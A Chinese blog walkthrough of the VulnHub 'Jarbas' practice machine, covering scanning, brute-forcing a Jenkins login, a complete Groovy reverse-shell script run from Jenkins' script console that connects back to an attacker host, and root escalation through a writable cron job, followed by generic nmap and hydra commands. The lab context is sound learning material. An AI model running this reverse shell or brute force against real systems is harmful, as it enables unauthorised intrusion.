vulnhub靶机学习jarbas

文章讲述了通过arp-scan和nmap发现并扫描靶机,尝试mysql登录未果后,转向Web端。在8080端口找到登录界面,通过字典爆破登录Jenkins。利用Jenkins的脚本执行功能反弹shell,进一步通过计划任务实现提权,最终获取root权限。整个过程展示了常规的渗透测试步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

靶机发现和端口扫描

利用arp-scan -l发现靶机,同时利用nmap对靶机进行简单的端口扫描。

分别开放了22 80 3306 和8080

在利用脚本漏洞扫描时并未发现有什么明显漏洞

建立简单的思路 先尝试mysql登录---web---ssh爆破

mysql尝试

尝试mysql登录后无果进入web端

web

分别访问80和8080

 

其中8080这里跳转到了一个登录界面。再去探索这两个界面没有什么发现,尝试爆破目录。

 这里在80端口可以找到一个access.html的界面。

 

分别解密以后建立一个小的用户和密码字典

这时回到登录窗口用字典爆破,eder/vipsu可以登录

这里学习到了Jenkins存在一个后台可执行命令的地方 系统管理-->脚本命令执行。

 这里在其他博主的文章中找到了反弹shell的代码,直接使用即可,前两行为设置自己的ip和端口。

String host="x.x.x.x";
int port=1333;
String cmd="/bin/bash";
//ProcessBuilder创建操作系统进程
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed())
{while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());
    while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try
{p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

 在本地监听指定的端口号,等待连接即可

 连接成功后这里搜集一下基础信息 uname -a sudo -l之后发现并没有什么明显可以利用的地方,那看看计划任务吧,在计划任务中找到一条记录,去该目录下发现这条任务也时任意用户写入的,那么直接写一个反弹shell就好,等待连接即可。

最终拿下root权限

 总结

       靶机整体水平比较简单。主要思路十分常规,搜索目录,找到账号信息进入后台,在后台功能点出发现可执行系统命令,反弹shell后利用计划任务提权。

### 关于 VulnHub 平台上的 Jan 靶机 #### 环境准备 对于渗透测试环境的选择,通常会采用 Kali Linux 作为攻击平台。Kali 是一款专门为渗透测试设计的操作系统,内置了大量的安全工具[^2]。 #### 初始信息收集 针对任何靶机的第一步都是进行全面的信息收集。这包括但不限于网络扫描、服务识别和服务版本检测。可以利用 `nmap` 进行初步的端口扫描和操作系统指纹识别: ```bash nmap -A <target_ip> ``` #### Web 应用分析 许多靶机会提供 web 接口供玩家探索。此时应该仔细审查网页源代码并尝试发现隐藏文件夹或路径。如果遇到 base64 编码的内容,则可能需要对其进行解码来揭示潜在线索[^1]。 #### 用户认证绕过与暴力破解 当面对受保护资源时,考虑是否存在弱密码或其他形式的身份验证缺陷。Hydra 工具能够帮助执行字典攻击以猜测常见用户名/密码组合: ```bash hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://<target_ip> ``` #### 权限提升技巧 一旦获得低权限 shell 访问后,下一步就是寻找方法提高当前用户的访问级别。LXD 容器逃逸是一种常见的提权手段,在某些情况下可能会被利用。 尽管上述内容提供了通用性的指导方针,但对于特定名称为 "Jan" 的 VulnHub 靶机的具体细节并未提及。建议查阅官方文档或者社区贡献者分享的相关 Walkthrough 文章获取更精确的帮助。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值